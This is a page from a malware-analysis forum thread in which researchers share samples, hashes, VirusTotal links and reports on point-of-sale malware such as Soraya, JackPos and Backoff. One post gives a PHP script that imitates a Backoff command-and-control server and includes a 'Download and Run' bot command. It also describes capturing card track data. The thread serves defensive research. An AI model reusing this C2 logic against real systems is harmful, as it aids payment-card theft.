A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23064  by Xylitol
 Sun Jun 08, 2014 8:25 am
Image Image
Bunch of POS Malwares in attach (JackPos/Soraya/rdasrv/mmon)...
for SetupX.exe the password of the installer is 'Rome0' and drop mmon and rdasrv into /system32/
http://vxvault.siri-urz.net/ViriList.ph ... .91.198.91
Code: Select all
Uname: Linux rome0.com 2.6.32-29-pve #1 SMP Thu Apr 24 10:03:02 CEST 2014 i686
$ last -f /var/log/wtmp
reboot   system boot  2.6.32-29-pve    Fri May 16 14:28 - 05:57 (22+15:29)
reboot   system boot  2.6.32-19-pve    Fri May 16 10:26 - 05:57 (22+19:31)
accounts pts/0        37.48.81.44      Thu Apr 24 18:55 - 13:54  (18:59)
reboot   system boot  2.6.32-19-pve    Sat Mar 15 11:08 - 10:07 (61+22:59)
root     pts/0        37.48.81.52      Sat Mar 15 10:56 - down   (00:11)
reboot   system boot  2.6.32-19-pve    Sat Feb 22 09:00 - 11:07 (21+01:07)
root     pts/0        37.48.81.48      Sat Feb 22 07:28 - down   (01:32)
reboot   system boot  2.6.32-19-pve    Sat Feb 22 07:27 - 09:00  (01:32)

wtmp begins Sat Feb 22 07:27:23 2014
Soraya:
https://www.virustotal.com/en/file/a776 ... 402224931/
https://www.virustotal.com/en/file/04b5 ... 402224932/
https://www.virustotal.com/en/file/c1a2 ... 402224934/
https://www.virustotal.com/en/file/33f0 ... 402225093/
https://www.virustotal.com/en/file/0866 ... 402225092/
JackPos:
https://www.virustotal.com/en/file/6347 ... 402225135/
mmon:
https://www.virustotal.com/en/file/7b31 ... 402225162/
bundled installer:
https://www.virustotal.com/en/file/6050 ... 402225205/
You do not have the required permissions to view the files attached to this post.
 #23108  by nielsgroeneveld
 Fri Jun 13, 2014 7:50 am
It seems a new kind of POS malware is being used at the moment, which is labelled as ''POSCLOUD.Backdoor/Agent'' by IntelCrawler -

Small businesses running cloud-based POS software hit with unique 'POSCLOUD' malware
http://www.scmagazine.com/small-busines ... le/355301/

Title: Cloud-Based POS Software – “New Target for Hackers?”
Published Date: June 11, 2014
Reference Number: IC-INT-753
http://intelcrawler.com/intel/webpos.pdf

Has anyone seen samples of other relevant information such as MD5 hashes relating to ''POSCLOUD'' ?
 #23323  by EP_X0FF
 Thu Jul 10, 2014 2:51 am
dwsfra wrote:uCare, can you upload the unpacked bins of Soraya?
Thanks
Soyara not Soraya.
You do not have the required permissions to view the files attached to this post.
 #23489  by forty-six
 Thu Jul 31, 2014 8:28 pm
Couple of hashes from the article :

F5B4786C28CCF43E569CB21A6122A97E

17E1173F6FC7E920405F8DBDE8C9ECAC
You do not have the required permissions to view the files attached to this post.
 #23695  by cr33k
 Wed Aug 27, 2014 10:56 am
uCares wrote:Unpacked Backoff 1.55 AERO3
I have been analyzing this bin and have gotten it to connect to my test server and successfully execute 'Uninstall' and 'Terminate' commands but 'Download and Run' and 'Update' commands seem to fail even with ':' delimiter between command and parameter.

Anyways, I also did a test to see if it could grab track1/2 data and it did however I am still working on decrypting the sent data. I know its something along the lines of: RC4_decrypt(base64_decode("encrypteddata")"rc4key")

but I still cant figure it out.

Anyone?

I have written this script to test communication:
Code: Select all
<?php 

	$in_op 		= $_POST['op'];
	$in_id 		= $_POST['id'];
	$in_ui 		= $_POST['ui'];
	$in_wv 		= $_POST['wv'];
	$in_gr 		= $_POST['gr'];
	$in_bv 		= $_POST['bv'];
	$in_data 	= $_POST['data'];
	
	
	
	$File = "log.html"; 
	$Handle = fopen($File, 'a+');
	
	$Data = "</br><b>New Log:</b> </br>".$in_op."</br>".$in_id."</br>".$in_ui."</br>".$in_wv."</br>".$in_gr."</br>".$in_bv."</br>".$in_data."</br>";
	
	fwrite($Handle, $Data); 
	
//      Download and Run:http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe (Not working?why)
//      Uninstall

 	print "Thanks!"; 
	
	fclose($Handle); 
?>
 #23698  by cr33k
 Wed Aug 27, 2014 4:23 pm
New piece of Malware thats been making news lately for attacking pos terminals over RDP protocol.

Very detailed analysis here:
Code: Select all
http://www.fireeye.com/blog/technical/botnet-activities-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html
https://www.virustotal.com/en/file/c984 ... 425435172/
You do not have the required permissions to view the files attached to this post.
  • 1
  • 16
  • 17
  • 18
  • 19
  • 20
  • 25